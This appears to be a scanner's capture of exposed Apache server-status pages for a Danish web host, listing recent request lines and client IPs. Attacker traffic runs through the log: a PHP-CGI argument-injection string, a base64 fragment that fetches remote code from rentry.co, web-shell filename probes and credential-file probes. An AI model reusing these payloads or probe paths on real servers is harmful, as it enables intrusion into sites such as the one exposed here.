/wp-json/tdw/save_css HTTP/1.0 18-15347330/45/1859_ 0.042200.00.010.99 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 19-15347340/45/1858_ 0.042200.00.013.09 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 20-15347350/45/1798_ 0.052200.00.011.08 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 21-15347360/45/1764_ 0.041100.00.011.02 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 22-15347380/45/1662_ 0.041100.00.011.37 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 23-15347390/45/1648_ 0.04720.00.011.76 81.19.232.105webhotel5.webhosting.dkHEAD / HTTP/1.0 24-15347400/45/1628_ 0.04300.00.011.10 94.156.66.180www.lillekrabbe.dkGET /wp-includes/index.php HTTP/1.0 25-15347410/45/1574_ 0.05900.00.012.42 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 26-15347420/45/1635_ 0.04700.00.010.85 167.99.247.230webhotel5.webhosting.dkVudHMoJ2h0dHBzOi8vcmVudHJ5LmNvLzZxYWMzbjR5L3JhdycpKTs= HTTP/1.0 27-15347430/45/1566_ 0.05700.00.011.20 167.99.247.230webhotel5.webhosting.dkGET /wp-admin/css/colors/blue/h0rn3t-sp1d3rs.php HTTP/1.0 28-15347440/45/1584_ 0.05700.00.031.16 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 29-15347450/45/1474_ 0.04040.00.011.62 164.90.208.56webhotel5.webhosting.dkGET / HTTP/1.0 30-15347460/45/1454_ 0.04200.00.012.42 216.244.66.235webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 31-15347470/45/1357_ 0.04130.00.010.85 164.90.208.56webhotel5.webhosting.dkGET / HTTP/1.0 32-15355620/12/1112_ 0.001300.00.000.60 94.156.66.180www.lillekrabbe.dkGET /wp-includes/ID3/index.php HTTP/1.0 33-15355670/12/1051_ 0.001200.00.000.55 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 34-15355680/12/878_ 0.001100.00.000.52 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 35-15-0/0/759. 0.0719900.00.000.53 212.102.57.91webhotel5.webhosting.dkGET /wp-admin/images/module.php HTTP/1.0 36-15-0/0/708. 0.0819900.00.001.19 212.102.57.91webhotel5.webhosting.dkGET /wp-includes/radio.php HTTP/1.0 37-15-0/0/678. 0.0819900.00.000.56 212.102.57.91webhotel5.webhosting.dkGET /autoload_classmap.php HTTP/1.0 38-15-0/0/413. 0.0619900.00.000.17 212.102.57.91webhotel5.webhosting.dkGET /admin/controller/extension/wpm.php HTTP/1.0 39-15-0/0/318. 0.0719900.00.000.15 212.102.57.91webhotel5.webhosting.dkGET /payout.php HTTP/1.0 40-15-0/0/218. 0.0619900.00.000.24 212.102.57.91webhotel5.webhosting.dkGET /lock360.php HTTP/1.0 41-15-0/0/218. 0.0619900.00.000.28 212.102.57.91webhotel5.webhosting.dkGET /pi.php HTTP/1.0 42-14-0/0/144. 0.03297700.00.000.05 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 43-14-0/0/144. 0.05297700.00.000.05 66.249.65.198webhotel5.webhosting.dkGET /feed/ HTTP/1.0 44-14-0/0/144. 0.06297700.00.000.05 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 45-14-0/0/130. 0.05297700.00.000.05 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 46-14-0/0/129. 0.05297700.00.000.05 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 47-14-0/0/130. 0.03297700.00.000.06 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 48-14-0/0/83. 0.04297700.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 49-14-0/0/33. 0.05297700.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 50-14-0/0/33. 0.05297700.00.000.02 :
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3cbb05ad7
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Sunday, 16-Jun-2024 17:32:07 CEST Restart Time: Sunday, 16-Jun-2024 16:05:04 CEST Parent Server Generation: 1 Server uptime: 1 hour 27 minutes 3 seconds Total accesses: 6227 - Total Traffic: 6.7 MB CPU Usage: u1.27 s.67 cu0 cs0 - .0371% CPU load 1.19 requests/sec - 1354 B/second - 1136 B/request 1 requests currently being processed, 30 idle workers ______________W______...............__________.................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-1448620/31/175_ 0.031000.00.010.04 81.19.232.105webhotel5.webhosting.dkPOST /wp-login.php HTTP/1.0 1-1448630/31/175_ 0.03000.00.010.06 146.190.85.88webhotel5.webhosting.dkGET /wp-includes/style-engine/about.php HTTP/1.0 2-1448640/31/175_ 0.03000.00.010.12 146.190.85.88webhotel5.webhosting.dkGET /wp-includes/rest-api/about.php HTTP/1.0 3-1448650/31/175_ 0.04020.00.010.29 188.166.108.93webhotel5.webhosting.dkGET / HTTP/1.0 4-1448690/31/175_ 0.03000.00.010.05 188.166.108.93webhotel5.webhosting.dkGET /about HTTP/1.0 5-1448660/31/174_ 0.03000.00.010.05 188.166.108.93webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 6-1448670/31/174_ 0.03000.00.010.05 188.166.108.93webhotel5.webhosting.dkGET /server HTTP/1.0 7-1448680/31/175_ 0.03000.00.010.05 146.190.85.88webhotel5.webhosting.dkGET /wp-includes/SimplePie/about.php HTTP/1.0 8-1448700/31/174_ 0.04000.00.010.06 188.166.108.93webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 9-1448710/31/174_ 0.03000.00.010.05 188.166.108.93webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 10-1448720/31/174_ 0.02000.00.010.10 188.166.108.93webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 11-1448730/31/174_ 0.03000.00.010.08 188.166.108.93webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 12-1448740/31/175_ 0.03000.00.010.06 146.190.85.88webhotel5.webhosting.dkGET /wp-content/banners/about.php HTTP/1.0 13-1448780/30/159_ 0.03910.00.010.04 213.202.233.34webhotel5.webhosting.dkGET /inputs.php HTTP/1.0 14-1448750/30/174W 0.03000.00.010.06 188.166.108.93webhotel5.webhosting.dkGET /server-status HTTP/1.0 15-1448760/30/174_ 0.021200.00.010.05 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 16-1448790/30/174_ 0.031000.00.010.12 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 17-1448800/30/173_ 0.03900.00.010.13 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 18-1448810/30/174_ 0.03800.00.010.09 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 19-1448820/30/174_ 0.03800.00.010.13 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 20-1448830/30/174_ 0.03800.00.010.23 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 21-1-0/0/144. 0.0750900.00.000.10 195.78.54.246webhotel5.webhosting.dkGET /rDkvTUar0XIX/ HTTP/1.0 22-1-0/0/144. 0.0750900.00.000.13 195.78.54.246webhotel5.webhosting.dkGET /novo/ HTTP/1.0 23-1-0/0/144. 0.0750900.00.001.55 195.78.54.246webhotel5.webhosting.dkGET /.tmb/ HTTP/1.0 24-1-0/0/144. 0.0850900.00.000.08 195.78.54.246webhotel5.webhosting.dkGET /api/ HTTP/1.0 25-1-0/0/143. 0.0750900.00.000.96 195.78.54.246webhotel5.webhosting.dkGET /es/ HTTP/1.0 26-1-0/0/143. 0.0650800.00.000.13 195.78.54.246webhotel5.webhosting.dkGET /social/ HTTP/1.0 27-1-0/0/143. 0.0650800.00.000.08 195.78.54.246webhotel5.webhosting.dkGET /de/ HTTP/1.0 28-1-0/0/142. 0.0750800.00.000.14 195.78.54.246webhotel5.webhosting.dkGET /nl/ HTTP/1.0 29-1-0/0/128. 0.0550800.00.000.14 195.78.54.246webhotel5.webhosting.dkGET /ivc/ HTTP/1.0 30-1-0/0/129. 0.0748700.00.000.10 195.78.54.246webhotel5.webhosting.dkGET /offer-01/ HTTP/1.0 31-1-0/0/129. 0.0748500.00.000.20 81.19.232.105webhotel5.webhosting.dkGET /wp-content/themes/include.php HTTP/1.0 32-1-0/0/128. 0.0648500.00.000.14 195.78.54.246webhotel5.webhosting.dkGET /images/1/ HTTP/1.0 33-1-0/0/129. 0.0646900.00.000.16 195.78.54.246webhotel5.webhosting.dkGET /NWremapping/wp-content/ HTTP/1.0 34-1-0/0/128. 0.0746900.00.000.20 195.78.54.246webhotel5.webhosting.dkGET /el/home-version-1/ HTTP/1.0 35-1-0/0/93. 0.0746800.00.000.13 195.78.54.246webhotel5.webhosting.dkGET /wp-content/themes/ccx/ HTTP/1.0 36-1448840/30/73_ 0.03800.00.010.10 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 37-1448850/30/58_ 0.03700.00.010.15 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 38-1448860/30/58_ 0.02700.00.010.09 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 39-1448870/30/59_ 0.03700.00.010.07 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 40-1448880/30/59_ 0.03700.00.010.01 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 41-1448890/30/59_ 0.02700.00.010.02 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 42-1448900/30/58_ 0.04700.00.010.02 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 43-1448910/30/58_ 0.03200.00.010.02 146.190.85.88webhotel5.webhosting.dkGET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0 44-1448920/30/59_ 0.04150.00.010.08 188.166.108.93webhotel5.webhosting.dkGET / HTTP/1.0 45-1448930/30/30_ 0.04100.00.010.01 146.190.85.88webhotel5.webhosting.dkGET /wp-includes/Requests/about.php HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde36e17cc77
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Wednesday, 12-Jun-2024 11:35:43 CEST Restart Time: Wednesday, 12-Jun-2024 06:05:05 CEST Parent Server Generation: 5 Server uptime: 5 hours 30 minutes 38 seconds Total accesses: 28568 - Total Traffic: 26.0 MB CPU Usage: u1.66 s.79 cu0 cs0 - .0124% CPU load 1.44 requests/sec - 1375 B/second - 955 B/request 1 requests currently being processed, 47 idle workers ______________________W_________________________................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-5652570/45/832_ 0.051400.00.010.41 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 1-5652590/47/831_ 0.06600.00.010.72 66.249.77.72webhotel5.webhosting.dktent/uploads/2012/03/03-Opret-en-amerikansk-Paypal.png HTTP/1.0 2-5653500/45/832_ 0.07400.00.011.22 159.65.144.72webhotel5.webhosting.dkGET /server HTTP/1.0 3-512370/29/815_ 0.045880.00.010.60 139.144.68.207www.team-otte.dkGET / HTTP/1.0 4-5653300/46/829_ 0.07420.00.011.12 159.65.144.72webhotel5.webhosting.dkGET / HTTP/1.0 5-5652740/46/829_ 0.06300.00.012.89 159.65.144.72webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 6-5653180/46/830_ 0.06100.00.010.50 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 7-5652600/45/827_ 0.061600.00.010.38 66.219.242.248webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 8-5653190/46/826_ 0.05100.00.012.33 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 9-5653230/45/826_ 0.063400.00.010.56 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 10-5653240/45/826_ 0.055800.00.010.62 162.158.38.94webhotel5.webhosting.dkGET /wp-content/install.php HTTP/1.0 11-5653310/46/827_ 0.0638140.00.020.54 47.128.112.109www.valloe.orgGET /galleri/nr10001.jpg HTTP/1.0 12-5653320/44/824_ 0.063400.00.010.49 68.154.0.242webhotel5.webhosting.dkGET /wp-login.php HTTP/1.0 13-5653510/44/824_ 0.052500.00.010.44 172.69.89.133webhotel5.webhosting.dkGET /index.php HTTP/1.0 14-5653520/45/826_ 0.06700.00.010.42 66.249.77.73webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 15-5653570/45/817_ 0.05200.00.010.91 159.65.144.72webhotel5.webhosting.dkGET /about HTTP/1.0 16-5653580/45/825_ 0.04200.00.010.69 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 17-5653590/45/823_ 0.05200.00.010.52 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 18-5653600/45/825_ 0.06100.00.010.50 159.65.144.72webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 19-5653700/45/806_ 0.05100.00.010.37 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 20-5653710/45/811_ 0.06100.00.010.72 159.65.144.72webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 21-5653720/45/825_ 0.05000.00.010.54 159.65.144.72webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 22-5653730/44/810W 0.06000.00.010.51 159.65.144.72webhotel5.webhosting.dkGET /server-status HTTP/1.0 23-5653740/45/793_ 0.05000.00.010.54 190.92.206.161webhotel5.webhosting.dkGET /vare-tag/house/?add-to-cart=1679 HTTP/1.0 24-5653750/44/757_ 0.065800.00.010.40 162.158.38.94webhotel5.webhosting.dkGET /wp-includes/Requests/dropdown.php HTTP/1.0 25-5653760/44/756_ 0.065800.00.010.67 162.158.38.94webhotel5.webhosting.dkGET /.well-known/admin.php HTTP/1.0 26-5653770/44/752_ 0.055800.00.010.45 162.158.38.94webhotel5.webhosting.dkGET /revision.php HTTP/1.0 27-512400/29/682_ 0.035800.00.010.49 162.158.38.94webhotel5.webhosting.dkGET /css/sgd.php HTTP/1.0 28-512410/29/640_ 0.045800.00.030.46 139.144.68.207www.team-otte.dkGET / HTTP/1.0 29-5653250/45/650_ 0.052510.00.011.50 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 30-512440/28/559_ 0.035800.00.010.44 162.158.38.94webhotel5.webhosting.dkGET /wp-content/plugins/index.php HTTP/1.0 31-512450/30/480_ 0.055210.00.050.60 139.144.68.207www.team-otte.dkGET / HTTP/1.0 32-512460/29/511_ 0.0554690.00.010.20 115.202.64.189webhotel5.webhosting.dkGET / HTTP/1.0 33-5653260/45/475_ 0.062300.00.010.49 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 34-5653330/45/461_ 0.06710.00.010.32 185.31.99.188www.valloe.orgGET /robots.txt HTTP/1.0 35-5653340/45/344_ 0.071300.00.010.24 94.156.71.219webhotel5.webhosting.dkGET /wp-includes/images/include.php HTTP/1.0 36-5653350/45/314_ 0.0519200.00.010.14 66.249.77.233www.all2one.dkrneringer/turneringer_frameset.html?tournament=kmh2009 HTTP/1.0 37-5653360/45/278_ 0.062300.00.010.38 65.109.34.52webhotel5.webhosting.dkGET /iluko HTTP/1.0 38-5653370/46/163_ 0.071060.00.010.08 159.65.144.72webhotel5.webhosting.dkGET / HTTP/1.0 39-512470/29/145_ 0.045100.00.010.06 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 40-512490/29/145_ 0.064400.00.010.16 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 41-512500/29/145_ 0.034100.00.010.05 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 42-512510/29/145_ 0.03388050.00.010.04 47.128.112.109www.valloe.orgGET /tekst/20100205.htm HTTP/1.0 43-512520/29/145_ 0.034140.00.010.23 173.252.83.31webhotel5.webhosting.dkGET / HTTP/1.0 44-512530/29/95_ 0.044700.00.010.03 81.19.232.105webhotel5.webhosting.dkGET /wp-content/plugins/WordPressCore/include.php HTTP/1.0 45-512540/29/79_ 0.033780.00.020.03 47.128.112.109www.valloe.orgGET /galleri/nr10002.jpg HTTP/1.0 46-512550/29/79_ 0.0323140.00.010.03 65.109.34.52webhotel5.webhosting.dkGET / HTTP/1.0 47-512560/29/29_ 0.043600.00.010.01 95.159.95.111webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot <
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3a0ae4b61
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Monday, 10-Jun-2024 06:37:21 CEST Restart Time: Monday, 10-Jun-2024 06:05:04 CEST Parent Server Generation: 0 Server uptime: 32 minutes 17 seconds Total accesses: 1220 - Total Traffic: 834 kB CPU Usage: u1.25 s.54 cu0 cs0 - .0924% CPU load .63 requests/sec - 440 B/second - 700 B/request 1 requests currently being processed, 34 idle workers _____________________________W_____............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-0487140/36/36_ 0.061900.00.020.02 206.189.156.137webhotel5.webhosting.dkGET /blog/wp-includes/wlwmanifest.xml HTTP/1.0 1-0487150/35/35_ 0.052400.00.010.01 156.146.60.30webhotel5.webhosting.dkGET /sito/wp-includes/wlwmanifest.xml HTTP/1.0 2-0487160/36/36_ 0.06000.00.020.02 207.154.197.113webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 3-0487170/35/35_ 0.042000.00.030.03 206.189.156.137webhotel5.webhosting.dkGET /wp-includes/ID3/license.txt HTTP/1.0 4-0487180/35/35_ 0.052000.00.040.04 206.189.156.137webhotel5.webhosting.dkGET /feed/ HTTP/1.0 5-0487190/35/35_ 0.061970.00.020.02 35.95.130.49www.valloe.orgGET /motor/oops11.htm HTTP/1.0 6-0487200/35/35_ 0.042120.00.020.02 206.189.156.137webhotel5.webhosting.dkGET / HTTP/1.0 7-0487210/35/35_ 0.041900.00.020.02 206.189.156.137webhotel5.webhosting.dkGET /xmlrpc.php?rsd HTTP/1.0 8-0487220/35/35_ 0.051200.00.020.02 206.189.156.137webhotel5.webhosting.dkGET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0 9-0487230/35/35_ 0.041000.00.020.02 206.189.156.137webhotel5.webhosting.dkGET /2020/wp-includes/wlwmanifest.xml HTTP/1.0 10-0487240/34/34_ 0.052500.00.010.01 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 11-0487250/35/35_ 0.061200.00.030.03 206.189.156.137webhotel5.webhosting.dkGET /web/wp-includes/wlwmanifest.xml HTTP/1.0 12-0487260/35/35_ 0.051100.00.020.02 206.189.156.137webhotel5.webhosting.dkGET /wp/wp-includes/wlwmanifest.xml HTTP/1.0 13-0487270/35/35_ 0.06900.00.020.02 206.189.156.137webhotel5.webhosting.dkGET /2021/wp-includes/wlwmanifest.xml HTTP/1.0 14-0487280/35/35_ 0.06900.00.020.02 206.189.156.137webhotel5.webhosting.dkGET /2019/wp-includes/wlwmanifest.xml HTTP/1.0 15-0487290/35/35_ 0.04810.00.060.06 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 16-0487300/35/35_ 0.06400.00.020.02 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 17-0487310/35/35_ 0.05800.00.010.01 206.189.156.137webhotel5.webhosting.dkGET /shop/wp-includes/wlwmanifest.xml HTTP/1.0 18-0487320/35/35_ 0.05400.00.020.02 206.189.156.137webhotel5.webhosting.dkGET /test/wp-includes/wlwmanifest.xml HTTP/1.0 19-0487330/35/35_ 0.06100.00.020.02 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 20-0487340/35/35_ 0.05000.00.030.03 207.154.197.113webhotel5.webhosting.dkGET /server HTTP/1.0 21-0487360/35/35_ 0.05700.00.020.02 206.189.156.137webhotel5.webhosting.dkGET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0 22-0487370/35/35_ 0.06220.00.020.02 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 23-0487400/35/35_ 0.06150.00.030.03 207.154.197.113webhotel5.webhosting.dkGET / HTTP/1.0 24-0487410/35/35_ 0.06020.00.020.02 207.154.197.113webhotel5.webhosting.dkGET / HTTP/1.0 25-0487420/35/35_ 0.04000.00.020.02 207.154.197.113webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 26-0487430/35/35_ 0.04000.00.020.02 207.154.197.113webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 27-0487470/35/35_ 0.06000.00.030.03 207.154.197.113webhotel5.webhosting.dkGET /about HTTP/1.0 28-0487480/35/35_ 0.05000.00.020.02 207.154.197.113webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 29-0487490/34/34W 0.04000.00.120.12 207.154.197.113webhotel5.webhosting.dkGET /server-status HTTP/1.0 30-0487500/34/34_ 0.052500.00.010.01 156.146.60.30webhotel5.webhosting.dkGET /site/wp-includes/wlwmanifest.xml HTTP/1.0 31-0487510/34/34_ 0.042230.00.010.01 71.60.32.41webhotel5.webhosting.dkGET / HTTP/1.0 32-0487520/34/34_ 0.052800.00.020.02 156.146.60.30webhotel5.webhosting.dkGET /media/wp-includes/wlwmanifest.xml HTTP/1.0 33-0487530/34/34_ 0.052700.00.010.01 156.146.60.30webhotel5.webhosting.dkGET /wp2/wp-includes/wlwmanifest.xml HTTP/1.0 34-0487540/34/34_ 0.062500.00.010.01 156.146.60.30webhotel5.webhosting.dkGET /cms/wp-includes/wlwmanifest.xml HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3ee52b127
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Saturday, 08-Jun-2024 08:29:29 CEST Restart Time: Saturday, 08-Jun-2024 06:05:04 CEST Parent Server Generation: 2 Server uptime: 2 hours 24 minutes 25 seconds Total accesses: 7465 - Total Traffic: 7.8 MB CPU Usage: u1.45 s.62 cu0 cs0 - .0239% CPU load .862 requests/sec - 942 B/second - 1094 B/request 1 requests currently being processed, 33 idle workers _________________________W..___._____........................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-2103210/39/224_ 0.05700.00.010.15 81.19.232.105webhotel5.webhosting.dkGET /favicon.ico HTTP/1.0 1-2103240/39/223_ 0.05000.00.010.16 164.90.228.79webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 2-2103220/39/224_ 0.06300.00.020.10 111.90.148.123webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 3-2103230/39/223_ 0.06020.00.010.17 164.90.228.79webhotel5.webhosting.dkGET / HTTP/1.0 4-2103270/39/223_ 0.054400.00.010.12 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 5-2103250/39/223_ 0.06010.00.090.22 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 6-2103300/38/222_ 0.062500.00.010.12 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 7-2103260/39/223_ 0.05000.00.010.08 164.90.228.79webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 8-2103280/38/222_ 0.0533110.00.010.20 199.45.155.20webhotel5.webhosting.dkGET / HTTP/1.0 9-2103290/38/222_ 0.072700.00.010.14 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 10-2103310/38/222_ 0.052100.00.010.08 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 11-2103320/38/221_ 0.051800.00.010.26 45.138.16.32webhotel5.webhosting.dkGET /alfa-rex.php HTTP/1.0 12-2103510/38/221_ 0.05130.00.010.16 164.90.228.79webhotel5.webhosting.dkGET / HTTP/1.0 13-2103900/38/221_ 0.05000.00.011.78 164.90.228.79webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 14-2104240/37/220_ 0.073740.00.010.14 81.19.232.105webhotel5.webhosting.dkHEAD / HTTP/1.0 15-2104250/37/220_ 0.044300.00.010.12 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 16-2104340/37/219_ 0.052400.00.010.12 185.231.113.55webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 17-2104450/37/220_ 0.072220.00.010.11 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 18-2104560/37/220_ 0.052160.00.010.21 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 19-2104670/37/219_ 0.061500.00.010.10 213.202.233.34webhotel5.webhosting.dkGET /inputs.php HTTP/1.0 20-2104700/37/220_ 0.06200.00.010.11 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 21-2104710/37/220_ 0.04000.00.020.12 164.90.228.79webhotel5.webhosting.dkGET /server HTTP/1.0 22-2105080/36/219_ 0.062740.00.010.17 